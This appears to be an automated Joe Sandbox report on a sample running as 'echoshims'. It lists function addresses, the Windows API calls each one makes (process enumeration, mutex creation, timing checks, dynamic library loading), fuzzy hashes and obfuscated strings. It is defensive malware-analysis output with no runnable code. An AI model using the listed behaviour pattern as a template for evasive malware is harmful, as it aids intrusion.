Source File: 00000015.00000002.1073582170.003C0000.00000040.sdmp, Offset: 003C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3c0000_echoshims.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: ea54ddac958da83f2a9547fbe410ff5323b71b27bb7eed9ce96d45418a960146
Instruction ID: 796a6f0ffa41f3b1411c993af5cf1d0d09882c82e3013d1f442fb039d1ee2c53
Opcode Fuzzy Hash: ea54ddac958da83f2a9547fbe410ff5323b71b27bb7eed9ce96d45418a960146
Instruction Fuzzy Hash: 53E06DB5A102108BC716EF79ED16A547BF4A751304F008069C84ACB360DB31699ACB92

Uniqueness

Uniqueness Score: 0.23%

Function 003ECC09, Relevance: 3.0, APIs: 2, Instructions: 25
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 003ECC1D
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 003ECC35

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: 9137ad93749e3034a3f66b63addf9b5d04950b94996ca09e90276e9e34e8766a
Instruction ID: ea6b9325847548df17ccad1eb6230e7c4db4f14817865d100a33460ba1c04030
Opcode Fuzzy Hash: 9137ad93749e3034a3f66b63addf9b5d04950b94996ca09e90276e9e34e8766a
Instruction Fuzzy Hash: 90E0487164411557DB1297A9BC45BBF3BACAB04310F150269F509DA191DE319510C699

Uniqueness

Uniqueness Score: 0.01%

Function 003ECBA9, Relevance: 3.0, APIs: 2, Instructions: 25
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 003ECBBD
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 003ECBD5

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CreateMutex_snwprintf
String ID:
API String ID: 451050361-0
Opcode ID: adef0ead40268357b26d0909ca9ade4860ab3e691879a04b5acf5a7d16f93ba0
Instruction ID: d7a9c102a6129afea0e8d188c352fe98a2918a163f1e685bc851d871ae0c9080
Opcode Fuzzy Hash: adef0ead40268357b26d0909ca9ade4860ab3e691879a04b5acf5a7d16f93ba0
Instruction Fuzzy Hash: 15E0487164411557DB1397AABC45BBF3BACAB04310F150169F509EB191DE319510C6A9

Uniqueness

Uniqueness Score: 0.01%

Function 003E1C27, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 003E1C33
CloseHandle.KERNEL32 ref: 003E1C71

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseFirstHandleProcess32
String ID:
API String ID: 917458368-0
Opcode ID: f9d1f1f1e6f508ca9155cb5fbf0e77f29f613c7a98f75950522b5b206fb1a84f
Instruction ID: de1036ed6d22c9c974473879c60901aad77d3aefa43e64e19225c0633579b6c0
Opcode Fuzzy Hash: f9d1f1f1e6f508ca9155cb5fbf0e77f29f613c7a98f75950522b5b206fb1a84f
Instruction Fuzzy Hash: 5BC012B0001120AAEA222B72BC0CB7F3E2CFB02300F208182E91290180CB744A04CEAA

Uniqueness

Uniqueness Score: 0.01%

Function 003E1C58, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 003E1C58
CloseHandle.KERNEL32 ref: 003E1C71

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseHandleNextProcess32
String ID:
API String ID: 4007157957-0
Opcode ID: 9a535e0ac8fc1836e5ca0a0c0a4970dd62ae9d7d3ad60b61671d5880381422eb
Instruction ID: fe4185807e63db7a444d5d92ee9d915875a01000264b1290b07cd0a012bde897
Opcode Fuzzy Hash: 9a535e0ac8fc1836e5ca0a0c0a4970dd62ae9d7d3ad60b61671d5880381422eb
Instruction Fuzzy Hash: 79B09271144050869A2A1B3AB80C23A2E28BD02745B215607A903C02E0DB208600DA1A

Uniqueness

Uniqueness Score: 0.01%

Function 003ECB35, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32 ref: 003ECB35

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: DirectoryWindows
String ID:
API String ID: 3619848164-0
Opcode ID: 548dcfdf9ba0b18797e2e1f47d4d2b29aa5767a5dd9108d18ef45c7ff20b3e97
Instruction ID: 9082e643ee7d5b1e2709dc696da3a6bc24c0ac0733e50d3777d04b14a9b52065
Opcode Fuzzy Hash: 548dcfdf9ba0b18797e2e1f47d4d2b29aa5767a5dd9108d18ef45c7ff20b3e97
Instruction Fuzzy Hash: F0D01222D551998ACF328B51E8473797378F701311F0553C6D81D871D0EBB14CD186D1

Uniqueness

Uniqueness Score: 0.02%

Function 003EF290, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 003EF2B0

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 020285c12b961736c89cd58a82e6f0fe5239193eb8aff188e41540db218c1744
Instruction ID: c06709e9e7cb3944bff20d1d3637d3d62e1ed6309f115b9ce1017f605fa813c2
Opcode Fuzzy Hash: 020285c12b961736c89cd58a82e6f0fe5239193eb8aff188e41540db218c1744
Instruction Fuzzy Hash: EFC00225125AE455921737FB4D0B71E31485B01751F550724AA60980D6EE60BA81847B

Uniqueness

Uniqueness Score: 0.01%

Function 003E1C10, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 003E1C14

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 1f2fa6a3a52f6857b4774789dfe4e7ff1a1c8a242b3b2523667a43eeef9a0e55
Instruction ID: d1ed0425e564d9bda0aadd931a67002e8ad0e5ce421a59fcd88762c9893c97d7
Opcode Fuzzy Hash: 1f2fa6a3a52f6857b4774789dfe4e7ff1a1c8a242b3b2523667a43eeef9a0e55
Instruction Fuzzy Hash: D5B0927250462087CB39263D784C9285890265A334B3A1B238E7AD33F0A6708C829841

Uniqueness

Uniqueness Score: 0.01%

Function 003ECB71, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

APIs

GetVolumeInformationW.KERNELBASE ref: 003ECB7B

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 01e4d97c10b978c711504aba0c284a2e191d1a3b9528ba673fcfd9ef7ba935ca
Instruction ID: d1426c23a3c149d44531fe811ef0b83e0405a93ba2dc06bcb6d3dbe82e91af78
Opcode Fuzzy Hash: 01e4d97c10b978c711504aba0c284a2e191d1a3b9528ba673fcfd9ef7ba935ca
Instruction Fuzzy Hash: 75B0123088C15C47D7512BB0EC1D0BDBFB4EF06237B0002D6EC4D88132C9260AA3CE40

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Function 003E56EF, Relevance: .5, Instructions: 487COMMON

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e6911caee5eae0054daa3f46c9ada610556a0373be8f59c239613607520639
Instruction ID: fa141251a1664a932e5f4e1d9121552a7efbd4014ba31477de7d8641765b4358
Opcode Fuzzy Hash: 77e6911caee5eae0054daa3f46c9ada610556a0373be8f59c239613607520639
Instruction Fuzzy Hash: 4D12B171E0067ADBCF1ACF5AC8901BDBBB1FF54304F25426AD866A7780D7349941DB90

Uniqueness

Uniqueness Score: 0.00%

Function 003E1530, Relevance: .0, Instructions: 19COMMON

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdf58b05985aea59fd36abdd24ad0755cdf27633c22078bc85fd7d1e688ead3b
Instruction ID: bc6e53cee7cea67f32414430c474229333132d6a2fe1bb0186ff2de98fc5f24b
Opcode Fuzzy Hash: cdf58b05985aea59fd36abdd24ad0755cdf27633c22078bc85fd7d1e688ead3b
Instruction Fuzzy Hash: D7E0C2325014A0CBCB329A4AC880A69F7AAFBC27A072B0A1BD49B677C0C234BC008640

Uniqueness

Uniqueness Score: 0.00%

Function 003E21B0, Relevance: .0, Instructions: 3COMMON

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00

Uniqueness

Uniqueness Score: 0.00%

Function 003E814A, Relevance: 42.5, APIs: 1, Strings: 23, Instructions: 464libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003E9248

Strings

p3?, xrefs: 003E9126
}#y, xrefs: 003E90C2
`h, xrefs: 003E8550
x, xrefs: 003E8B18
]7, xrefs: 003E8F8C
+?5, xrefs: 003E9195
TyFi, xrefs: 003E8212
I5OD, xrefs: 003E8B68
SD`, xrefs: 003E8FAA
`[3f, xrefs: 003E85F0
;X~, xrefs: 003E8A00
)c=, xrefs: 003E88DE
= L-, xrefs: 003E8500
GQ:, xrefs: 003E8460
vrSw, xrefs: 003E8B2C
id]], xrefs: 003E86E0
2Hl9, xrefs: 003E90D6
-v8W, xrefs: 003E84BA
FKx|, xrefs: 003E8E42
', xrefs: 003E833E
\Oh, xrefs: 003E86F4
9N, xrefs: 003E8726
v9C, xrefs: 003E8F64

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: }#y$ +?5$)c=$-v8W$2Hl9$;X~$= L-$FKx|$GQ:$I5OD$SD`$TyFi$\Oh$`[3f$id]]$p3?$vrSw$v9C$'$9N$`h$]7$x
API String ID: 1029625771-3737649116
Opcode ID: 329a18a77715d45c49ab96f60a1ee55daa6eda9c34a1991b8c5b0ae3570c0ea0
Instruction ID: 936ac49af8bad27ff7a95e3d88030627daa1c2c6838960ddbe581a2c8e48c8de
Opcode Fuzzy Hash: 329a18a77715d45c49ab96f60a1ee55daa6eda9c34a1991b8c5b0ae3570c0ea0
Instruction Fuzzy Hash: E282A5F48567A98FDB619F429E857CEBA31BB51304F5082C8C19D3B215CB720B86CF89

Uniqueness

Uniqueness Score: 100.00%

Function 003EA78A, Relevance: 40.7, APIs: 1, Strings: 22, Instructions: 474libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003EB8EC

Strings

=z4, xrefs: 003EB45A
ML-', xrefs: 003EB4B4
)jt@, xrefs: 003EB7ED
7k/, xrefs: 003EB69E
/Z7~, xrefs: 003EACEE
eJn}, xrefs: 003EB568
@3?, xrefs: 003EB766
.ZI, xrefs: 003EAC4E
RN5`, xrefs: 003EAB90
\1>, xrefs: 003EA7A8
7K3, xrefs: 003EB720
%h(, xrefs: 003EB068
D=z, xrefs: 003EB5D6
:X<, xrefs: 003EB878
' #C, xrefs: 003EAE38
H D%, xrefs: 003EB55E
WfP=, xrefs: 003EAF3C
7, xrefs: 003EB388
B"* , xrefs: 003EB374
S1p, xrefs: 003EAA96
^a, xrefs: 003EAE7E
/g=, xrefs: 003EA9BA

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: .ZI$\1>$' #C$)jt@$/Z7~$7$7k/$:X<$=z4$@3?$B"* $D=z$H D%$ML-'$RN5`$S1p$WfP=$eJn}$%h($/g=$7K3$^a
API String ID: 1029625771-111035155
Opcode ID: 605ef00132b2f8d42e9f946f62ab49352349a9501f5d405c259c7a5aa1369696
Instruction ID: 60af1341ca9e22aaf55bf8f431873c5070746a54acfdedc8f8397c8ff08d8643
Opcode Fuzzy Hash: 605ef00132b2f8d42e9f946f62ab49352349a9501f5d405c259c7a5aa1369696
Instruction Fuzzy Hash: B382A6F48167698BDB71DF429E8578EBA35BB51304F6086C8C19D3B215CB720B92CF89

Uniqueness

Uniqueness Score: 100.00%

Function 003E72DA, Relevance: 30.0, APIs: 1, Strings: 16, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003E7C1C

Strings

'/~, xrefs: 003E744C
"C#}, xrefs: 003E79EC
9I;\, xrefs: 003E7820
wk#m, xrefs: 003E75D2
~o>, xrefs: 003E794C
$w 4, xrefs: 003E7A64
tcZ], xrefs: 003E769A
LP 3, xrefs: 003E78DE
e, xrefs: 003E7B3E
/d4, xrefs: 003E7B04
JIx, xrefs: 003E756E
P&?, xrefs: 003E7C05
d;, xrefs: 003E77BC
/@n, xrefs: 003E7A28
F2`?, xrefs: 003E7BD1
3@[, xrefs: 003E7A32

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: "C#}$$w 4$/@n$/d4$3@[$9I;\$F2`?$JIx$LP 3$P&?$tcZ]$wk#m$~o>$d;$'/~$e
API String ID: 1029625771-1328890179
Opcode ID: 46b275f309625c8d010d59716dc92cd2f73a829a2084e7b212ed217cb9231494
Instruction ID: 93b00820be07504496200eb8a9d4b93487ca13bd2e2fb820408c73ceb430eb59
Opcode Fuzzy Hash: 46b275f309625c8d010d59716dc92cd2f73a829a2084e7b212ed217cb9231494
Instruction Fuzzy Hash: AA12A7B48463A98FDB72DF8299897CDBA74BB12744F6086C8C15D3B214CB750B86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 003EC4A2, Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 188libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003ECAD8

Strings

M{%, xrefs: 003ECAAA
?z=B, xrefs: 003ECA33
P0?, xrefs: 003EC916
"RD, xrefs: 003ECAA3
y{-, xrefs: 003EC5D8
D 0, xrefs: 003EC524
Rh<R, xrefs: 003EC5E2
+, xrefs: 003EC8F8
5qP, xrefs: 003EC943
3|G, xrefs: 003EC9B1
yR O, xrefs: 003ECA25
"qZ, xrefs: 003EC8A8

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: "RD$"qZ$+$3|G$5qP$?z=B$D 0$M{%$P0?$Rh<R$yR O$y{-
API String ID: 1029625771-2099589413
Opcode ID: 630c82ad5fdc01cd6f79033cb899993f244ba89ace5c1eac2b7b0d1a0554707b
Instruction ID: 29460df1c67f2d366cbbf0cbd5b0f53eb8663d1704bc80499008965f15e49f05
Opcode Fuzzy Hash: 630c82ad5fdc01cd6f79033cb899993f244ba89ace5c1eac2b7b0d1a0554707b
Instruction Fuzzy Hash: B6E197B4846369CBDB60DF829A897DDBA30FB16304F6086C8C19D3B315DB750A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 003E9C2A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 312libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003EA738

Strings

3:, xrefs: 003EA6D2
;T{, xrefs: 003EA38C
"GT+, xrefs: 003E9D42
}W@, xrefs: 003EA662
B, xrefs: 003EA35A
*8c=, xrefs: 003EA27E
8q#V, xrefs: 003E9ED2
f,Ee, xrefs: 003E9CA2
2Cu, xrefs: 003EA5D5
bYT@, xrefs: 003E9CAC
`(?, xrefs: 003EA5B2

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: ;T{$"GT+$*8c=$3:$8q#V$B$`(?$bYT@$f,Ee$}W@$2Cu
API String ID: 1029625771-902285298
Opcode ID: d6f3569030bcc470efdb37f2f1f446d96ff10d688fa24d44aea9c398d88cc815
Instruction ID: 7872f3ebaa7849f8317f68578cab720bf02f43a9d4b024d2da3a3ee3a2ad0254
Opcode Fuzzy Hash: d6f3569030bcc470efdb37f2f1f446d96ff10d688fa24d44aea9c398d88cc815
Instruction Fuzzy Hash: 9232A6F4C163698BEB61DF4299897CCBB74BB01704F6096C8D1683A225CB754B85CF89

Uniqueness

Uniqueness Score: 100.00%

Function 003E929A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003E9BDC

Strings

[aY<, xrefs: 003E9B13
7cn@, xrefs: 003E9A56
,M[, xrefs: 003E94FC
z9, xrefs: 003E954C
?/&9, xrefs: 003E9858
XX, xrefs: 003E99F2
0E_, xrefs: 003E9452
OI5, xrefs: 003E9BCA
=WB, xrefs: 003E9B67
Jg, xrefs: 003E96B4
h , xrefs: 003E9A06

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: ,M[$0E_$7cn@$?/&9$OI5$[aY<$h $=WB$Jg$XX$z9
API String ID: 1029625771-656464786
Opcode ID: e99e77acb5ba051fd90f33f35dfd130a76fbd45fa7c4639010fd06fb41eca7f4
Instruction ID: 734de8ae5f2efbff15a96f7c5da12ee2f802713df4bcf071c5fa1d99e0f58af1
Opcode Fuzzy Hash: e99e77acb5ba051fd90f33f35dfd130a76fbd45fa7c4639010fd06fb41eca7f4
Instruction Fuzzy Hash: F412C5B4C563A9CBDB62DF829A897CDBB74BB01304F6096C8D1593B214CB750B82CF85

Uniqueness

Uniqueness Score: 100.00%

Function 003E6E3A, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 140libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 003E7290

Strings

V6'J, xrefs: 003E7254
p/?, xrefs: 003E716E
yfH, xrefs: 003E71E4
?&8, xrefs: 003E6EE4
D, xrefs: 003E6E6C

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: ?&8$V6'J$p/?$yfH$D
API String ID: 1029625771-2135511306
Opcode ID: 08eefff882b242f695c385a3adf6687cfebc5d984a91aaedb52b26a5e5d75697
Instruction ID: 648cf72c3f0a1e24633377347b81ff622ed663e6b7d6022e024e1d27d4f0be10
Opcode Fuzzy Hash: 08eefff882b242f695c385a3adf6687cfebc5d984a91aaedb52b26a5e5d75697
Instruction Fuzzy Hash: 8CA1A8B4C4936C8FEB618F81AA817CDBA71FB12344F6086C8C5693B614CB750A82CF95

Uniqueness

Uniqueness Score: 100.00%

Function 003ECE91, Relevance: 10.6, APIs: 7, Instructions: 93COMMON

APIs

GetTickCount.KERNEL32 ref: 003ECE9E
SetEvent.KERNEL32 ref: 003ECFF1

Part of subcall function 003EFAE0: lstrcmpiW.KERNEL32(003F7950,003F7540,?,003ECEE7), ref: 003EFB13

GetTickCount.KERNEL32 ref: 003ECEEB
GetTickCount.KERNEL32 ref: 003ECEFC
GetTickCount.KERNEL32 ref: 003ECF8D
GetTickCount.KERNEL32 ref: 003ECF9E
GetTickCount.KERNEL32 ref: 003ECFC8

Part of subcall function 003ECD40: GetTickCount.KERNEL32 ref: 003ECD4B
Part of subcall function 003ECD40: lstrlen.KERNEL32(00000000), ref: 003ECD75
Part of subcall function 003ECD40: GetTickCount.KERNEL32 ref: 003ECE46

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CountTick$Eventlstrcmpilstrlen
String ID:
API String ID: 637603502-0
Opcode ID: 2a3f64b6b56e6e6c06184666f57c63a1ab0bfcb4a6d60dd91b536f2a7e9f8814
Instruction ID: 3839820a0d7deb42a9c3a0be760fb56a5cb54bf4a3eadb0ee2c919682a7434ec
Opcode Fuzzy Hash: 2a3f64b6b56e6e6c06184666f57c63a1ab0bfcb4a6d60dd91b536f2a7e9f8814
Instruction Fuzzy Hash: 2431A1B15182B247D713AB77BC057AB369D9B40348F064675E910CA2E3EBB0C807DB61

Uniqueness

Uniqueness Score: 0.01%

Function 003E10B7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

APIs

_snwprintf.NTDLL ref: 003E10D6
CreateEventW.KERNEL32(?,00000001,?,?), ref: 003E10F1
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 003E10FE
CloseHandle.KERNEL32(00000000), ref: 003E1105
CloseHandle.KERNEL32(00000000), ref: 003E1111

Strings

?, xrefs: 003E10BA

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID: ?
API String ID: 2675716504-3840841325
Opcode ID: 68d777d3646bda69426bdc1397b32d6a715fdf3ec93b576217881990f5ab0f5e
Instruction ID: ef3b3cca2012aa08799c11bc119a0c1a3231bca56900f5fad4fc8c9e7c226948
Opcode Fuzzy Hash: 68d777d3646bda69426bdc1397b32d6a715fdf3ec93b576217881990f5ab0f5e
Instruction Fuzzy Hash: 40F0B476A00124A7C76367619C08FBF3A3DDF41700F054694F60AA72D1DB348940CBA5

Uniqueness

Uniqueness Score: 12.89%

Function 003E11CD, Relevance: 9.0, APIs: 6, Instructions: 27synchronizationCOMMON

APIs

GetModuleFileNameW.KERNEL32 ref: 003E11CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E11F1
CloseHandle.KERNEL32(?), ref: 003E11FA
